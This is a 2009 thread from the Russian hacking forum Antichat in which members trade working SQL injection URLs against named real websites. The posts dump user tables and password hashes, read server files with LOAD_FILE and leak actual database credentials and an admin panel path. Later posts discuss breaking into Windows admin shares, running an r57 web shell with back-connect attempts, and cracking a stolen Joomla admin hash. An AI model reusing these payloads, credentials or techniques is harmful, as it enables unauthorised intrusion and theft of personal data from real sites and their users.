ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

24.03.2009, 19:32
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Код:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),database(),version()),25,26,27,28,29,30,31,32,33,34.html
Вот инъекция. Табличка с юзерами называется user. Как мне их оттуда выдрать?
|
|
|

24.03.2009, 20:07
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
ограничение длины запроса. Вывод - никак по данной ссылке, даже при таком варианте:
Код:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,version(),5,6,7,8,9,0,1,2,3,4.html
вернее можно, элементарно, но так:
Код:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/1+and+substring(version(),1,1)=5.html
т.е. как бы вслепую
Последний раз редактировалось Pashkela; 24.03.2009 в 20:18..
|
|
|

24.03.2009, 20:20
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме: 791766
Репутация:
61
|
|
ПОмогите админку найти
http://www.rustrana.ru/
|
|
|

24.03.2009, 20:21
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме: 3152874
Репутация:
1020
|
|
Сообщение от mailbrush
Код:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),database(),version()),25,26,27,28,29,30,31,32,33,34.html
Вот инъекция. Табличка с юзерами называется user. Как мне их оттуда выдрать?
Чисто таблички user нету,
PHP код:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+DISTINCT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(concat(table_schema,0x2E,table_name)+separator+0x3c62723e),25,26,27,28,29,30,31,32,33,34+from+INFORMATION_SCHEMA.TABLES+where+table_schema+not+in+(0x696e666f726d6174696f6e5f736368656d61)+and+table_name+LIKE+0x257573657225.html
karabas_svalka2.t_users
karabas_svalka2.t_users_activate
karabas_svalka2.t_users(в t_users_activate такие же колумны):
PHP код:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+DISTINCT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(COLUMN_NAME+separator+0x3c62723e),25,26,27,28,29,30,31,32,33,34+from+INFORMATION_SCHEMA.COLUMNS+where+table_name='t_users'.html
id
email
passwd
user_type
creation_date
comment
name
phone
icq
id_city
id_country
bday
bmonth
byear
sex
id_prefix
ну не вижу в чем проблема вытаскивай например вот так с них:
PHP код:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,group_concat(concat_ws(0x3A,name,passwd)+separator+'%3Cbr%3E'),25,26,27,28,29,30,31,32,33,34+from+karabas_svalka2.t_users.html
2Byrger
Читалка файлов(как мило с их стороны  )
PHP код:
http://www.rustrana.ru/article.php?nid=3486853333+union+select+concat('/var/www/site3/public_html/connect.php',0x00),2,3,4,5,@@version,7,8,9,10,11,12,13,14,15--+
Реквизиты конекта MySQL:
USER:dbu_ansimov_1
PASS:BFzHAHAMz1K
Ну и сам phpMyAdmin - http://www.rustrana.ru/phpadm/
Последний раз редактировалось AkyHa_MaTaTa; 24.03.2009 в 22:04..
|
|
|

25.03.2009, 06:41
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме: 1385078
Репутация:
126
|
|
Сообщение от _SEREGA_
Люди,подскажите пожалуйста, как получить доступ на хдд локального компа. Я просканил его, у него открыты 139 тцп и 137 удп и ещё 135.
такая фишка типа 192.168.0.1/C$ ,admin$ и т.д. просит пароль! подскажите каким путём ломать.
чтобы зайти в эти директории нужно быть в той же группе что и тот комп к примеру: MSHOME
и у тебя название и пароль учётки должен быть такой же как у того админа...
|
|
|

25.03.2009, 07:13
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме: 2358980
Репутация:
930
|
|
Сообщение от _SEREGA_
Люди,подскажите подвлуйста, как полоучить доступ на хдд локального компа. Я просканил его, у него открыты 139 тцп и 137 удп и ещё 135.
такая фишка типа 192.168.0.1/C$ ,admin$ и т.д. просит пароль! подскажите каким путём ломать.
теперь проверь эти порты хspider'om на уязвимости
|
|
|

25.03.2009, 12:05
|
|
Новичок
Регистрация: 19.04.2008
Сообщений: 28
Провел на форуме: 201547
Репутация:
16
|
|
http://wow.homeline.kg/test/?apage=guilds&guid=102'
что тут можно сделать ? можно шелл залить ?
|
|
|

25.03.2009, 12:20
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Код:
http://wow.homeline.kg/test/?apage=guilds&guid=102+and+substring(version(),1,1)=5
5-я ветка.
Код:
http://wow.homeline.kg/test/?apage=guilds&guid=102+union+select+1
1 колонка без вывода.
Код:
http://wow.homeline.kg/test/?apage=guilds&guid=102+and+ascii(substring((SELECT+file_priv+from+mysql.user+limit+0,1),1,1))=89
file_priv=Y.
Шелл не зальёшь, файлы не прочтешь (ковычки фильтруются, принтабельных полей нету)
Последний раз редактировалось mailbrush; 25.03.2009 в 12:29..
|
|
|

25.03.2009, 12:50
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от mailbrush
Шелл не зальёшь, файлы не прочтешь (ковычки фильтруются, принтабельных полей нету)
Просто не нужно торопиться
http://wow.homeline.kg/test/?apage=guilds&guid=-102)+UNION+SELECT+1,2,3,concat_ws(0x3a,User(),Data base(),Version()),5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43--+
http://wow.homeline.kg/test/?apage=guilds&guid=-102)+UNION+SELECT+1,2,3,LOAD_FILE(0x633A2F626F6F74 2E696E69),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43--+
И ещё момент, file_priv так не проверяется. Тоесть в данном случае это прокатило, но ты же не знал, что база под рутом. Ты проверил его у первой записи в таблице, а это всегда (почти) рут. А нужно проверять у текущего юзера
|
|
|

25.03.2009, 15:54
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме: 192463
Репутация:
97
|
|
Поимел шелл на серваке, сплоит под это ядро имеется, gcc есть, но не могу забиндить порт (фаер блочит видимо), тупо виснет.Скомпилить через шелл так же не вышло.Бэк коннект средствами шелла пишет "Now script try connect to ИП port ПОРТ", но netcat молчит =( Возможно сижу за натом. Кто может помочь? В пм плиз.
З.Ы. Порты разные пробовал, shell - r57
________________________________
added
Ещё вопросец.
Вытянул из джумлы админский пасс в хеше
Такого вида
(id,username,password)
62::admin::b3b05184a80b4915a7ea49f1b06cefcb:Z1RKNC slakgoAAuq55wasFVX8zGRYkIa
Солёный? Или?
Последний раз редактировалось Imperou$; 25.03.2009 в 18:29..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|